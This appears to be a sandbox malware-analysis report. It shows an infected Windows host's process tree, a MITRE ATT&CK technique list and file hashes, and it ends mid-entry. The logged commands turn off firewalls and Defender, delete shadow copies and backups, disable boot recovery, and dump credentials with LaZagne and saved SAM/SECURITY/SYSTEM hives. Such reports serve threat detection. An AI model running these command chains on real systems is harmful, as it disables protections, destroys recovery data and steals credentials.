  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1448
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1720
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3900
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set domainprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4584
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set privateprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3320
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set publicprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3900
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:4672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4308
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    PID:3604
- C:\Users\Admin\AppData\Roaming\pass.exe
  "C:\Users\Admin\AppData\Roaming\pass.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & del /f credentials* & del /f pass.txt & del /f LaZagne.exe & del /f tool.bin
    3⤵
    PID:5552
- C:\Users\Admin\AppData\Roaming\steal.exe
  "C:\Users\Admin\AppData\Roaming\steal.exe"
  2⤵
  - Executes dropped EXE
  PID:3760
- - C:\Users\Admin\AppData\Roaming\steal.exe
    "C:\Users\Admin\AppData\Roaming\steal.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:5172
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5356
- C:\Users\Admin\AppData\Roaming\server.exe
  "C:\Users\Admin\AppData\Roaming\server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3308
- C:\Users\Admin\AppData\Roaming\discord.exe
  "C:\Users\Admin\AppData\Roaming\discord.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1032

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Users\Admin\AppData\Roaming\LaZagne.exe
laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
1⤵
- Executes dropped EXE
PID:5872
- C:\Users\Admin\AppData\Roaming\LaZagne.exe
  laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Accesses Microsoft Outlook profiles
  - Suspicious behavior: EnumeratesProcesses
  - outlook_office_path
  - outlook_win_path
  PID:5220
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\zrzictkljs"
    3⤵
    PID:5412
  - - C:\Windows\system32\reg.exe
      reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\zrzictkljs
      4⤵
      PID:5516
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\zeumcnrmbw"
    3⤵
    PID:5816
  - - C:\Windows\system32\reg.exe
      reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\zeumcnrmbw
      4⤵
      PID:5968
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\gzpynniwuidb"
    3⤵
    PID:6088
  - - C:\Windows\system32\reg.exe
      reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\gzpynniwuidb
      4⤵
      PID:1648

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\VCRUNTIME140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

SHA512
d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\VCRUNTIME140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

SHA512
d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_asyncio.pyd

Filesize
63KB

MD5
511a52bcb0bd19eda7aa980f96723c93

SHA1
b11ab01053b76ebb60ab31049f551e5229e68ddd

SHA256
d1fb700f280e7793e9b0dca33310ef9cd08e9e0ec4f7416854dffaf6f658a394

SHA512
d29750950db2ecbd941012d7fbdd74a2bbd619f1a92616a212acb144da75880ce8a29ec3313acbc419194219b17612b27a1833074bbbaa291cdb95b05f8486ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_cffi_backend.cp311-win_amd64.pyd

Filesize
177KB

MD5
210def84bb2c35115a2b2ac25e3ffd8f

SHA1
0376b275c81c25d4df2be4789c875b31f106bd09

SHA256
59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf

SHA512
cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_decimal.pyd

Filesize
247KB

MD5
be315973aff9bdeb06629cd90e1a901f

SHA1
151f98d278e1f1308f2be1788c9f3b950ab88242

SHA256
0f9c6cc463611a9b2c692382fe1cdd7a52fea4733ffaf645d433f716f8bbd725

SHA512
8ea715438472e9c174dee5ece3c7d9752c31159e2d5796e5229b1df19f87316579352fc3649373db066dc537adf4869198b70b7d4d1d39ac647da2dd7cfc21e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_hashlib.pyd

Filesize
63KB

MD5
1524882af71247adecf5815a4e55366a

SHA1
e25014c793c53503bdff9af046140edda329d01b

SHA256
6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327

SHA512
5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_multiprocessing.pyd

Filesize
33KB

MD5
2ca9fe51bf2ee9f56f633110a08b45cd

SHA1
88ba6525c71890a50f07547a5e9ead0754dd85b9

SHA256
1d6f1e7e9f55918967a37cbd744886c2b7ee193c5fb8f948132ba40b17119a81

SHA512
821551fa1a5aa21f76c4ae05f44ddd4c2daa00329439c6dadc861931fa7bd8e464b4441dfe14383f2bb30c2fc2dfb94578927615b089a303aa39240e15e89de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_overlapped.pyd

Filesize
49KB

MD5
ac053ef737e4f13b02bfa81f9e46170b

SHA1
5d8ebeb30671b74d736731696fedc78c89da0e1f

SHA256
cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f

SHA512
6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_queue.pyd

Filesize
31KB

MD5
8bbed19359892f8c95c802c6ad7598e9

SHA1
773fca164965241f63170e7a1f3a8fa17f73ea18

SHA256
4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065

SHA512
22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_queue.pyd

Filesize
31KB

MD5
8bbed19359892f8c95c802c6ad7598e9

SHA1
773fca164965241f63170e7a1f3a8fa17f73ea18

SHA256
4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065

SHA512
22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_sqlite3.pyd

Filesize
117KB

MD5
a7df575bf69570944b004dfe150e8caf

SHA1
2fd19be98a07347d59afd78c167601479aac94bb

SHA256
b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b

SHA512
18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_ssl.pyd

Filesize
172KB

MD5
a0b40f1f8fc6656c5637eacacf7021f6

SHA1
38813e25ffde1eee0b8154fa34af635186a243c1

SHA256
79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1

SHA512
c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\_uuid.pyd

Filesize
24KB

MD5
4faa479423c54d5be2a103b46ecb4d04

SHA1
011f6cdbd3badaa5c969595985a9ad18547dd7ec

SHA256
c2ad3c1b4333bc388b6a22049c89008505c434b1b85bff0823b19ef0cf48065a

SHA512
92d35824c30667af606bba883bf6e275f2a8b5cbfea2e84a77e256d122b91b3ee7e84d9f4e2a4946e903a11293af9648a45e8cfbe247cbdc3bcdea92eb5349c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\base_library.zip

Filesize
1.4MB

MD5
080b0d0a63f2663682a8c422d614fe0b

SHA1
e63662b070ca6c305ad54687680303411f7ff13b

SHA256
eb0a4049f68f1ec0fa55f97475e8209bc5c4836b68162b599d26a1a7195dbf39

SHA512
7e3fc1df03c1a367f2831589c2bd8b986734e77d301dd3efee35ef99a50d1863422e6f4f364c8d9c8a14f74921ab86ec49cfa557e910c728c515548b01d670dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libcrypto-3.dll

Filesize
4.9MB

MD5
7a6a8c2a8c379b111cdceb66b18d687d

SHA1
f3b8a4c731fa0145f224112f91f046fddf642794

SHA256
8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b

SHA512
f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\libssl-3.dll

Filesize
771KB

MD5
64acb046fe68d64ee475e19f67253a3c

SHA1
d9e66c9437ce6f775189d6fdbd171635193ec4cc

SHA256
b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10

SHA512
f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\pywin32_system32\pythoncom311.dll

Filesize
654KB

MD5
f98264f2dacfc8e299391ed1180ab493

SHA1
849551b6d9142bf983e816fef4c05e639d2c1018

SHA256
0fe49ec1143a0efe168809c9d48fe3e857e2ac39b19db3fd8718c56a4056696b

SHA512
6bb3dbd9f4d3e6b7bd294f3cb8b2ef4c29b9eff85c0cfd5e2d2465be909014a7b2ecd3dc06265b1b58196892bb04d3e6b0aa4b2ccbf3a716e0ff950eb28db11c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\pywin32_system32\pythoncom311.dll

Filesize
654KB

MD5
f98264f2dacfc8e299391ed1180ab493

SHA1
849551b6d9142bf983e816fef4c05e639d2c1018

SHA256
0fe49ec1143a0efe168809c9d48fe3e857e2ac39b19db3fd8718c56a4056696b

SHA512
6bb3dbd9f4d3e6b7bd294f3cb8b2ef4c29b9eff85c0cfd5e2d2465be909014a7b2ecd3dc06265b1b58196892bb04d3e6b0aa4b2ccbf3a716e0ff950eb28db11c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\pywin32_system32\pywintypes311.dll

Filesize
131KB

MD5
90b786dc6795d8ad0870e290349b5b52

SHA1
592c54e67cf5d2d884339e7a8d7a21e003e6482f

SHA256
89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a

SHA512
c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\pywin32_system32\pywintypes311.dll

Filesize
131KB

MD5
90b786dc6795d8ad0870e290349b5b52

SHA1
592c54e67cf5d2d884339e7a8d7a21e003e6482f

SHA256
89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a

SHA512
c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\sqlite3.dll

Filesize
1.4MB

MD5
b49b8fde59ee4e8178c4d02404d06ee7

SHA1
1816fc83155d01351e191d583c68e722928cce40

SHA256
1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f

SHA512
a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37602\unicodedata.pyd

Filesize
1.1MB

MD5
1905b5d0f945499441e8cd58eb123d86

SHA1
117e584e6fcc0e8cfc8e24e3af527999f14bac30

SHA256
b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532

SHA512
ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kju35y4i.e5e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\buxxelpna

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\crcook.txt

Filesize
18B

MD5
b9e8157d18b9bede4d2acc18dfe72a8a

SHA1
c616a2da76b6004ee5c2b4313295e741b6ebd2ae

SHA256
